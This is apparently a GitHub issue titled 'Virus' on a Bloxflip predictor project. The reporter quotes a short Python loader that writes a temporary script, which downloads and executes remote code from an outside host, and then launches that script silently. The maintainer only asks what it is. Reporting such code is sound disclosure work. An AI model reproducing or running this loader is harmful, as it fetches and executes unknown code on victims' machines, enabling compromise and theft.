### ISSUE TITLE
Virus

### ISSUE THREAD

**Issue by ajbo111** [BloxFlipAdmin/Bloxflip-Predictor#3]
Source:

from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://wasp.plague.fun/inject/MTJ8Vp5aynR51YMM').read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass

**Comment by BloxFlipAdmin** [comment]
what is this?
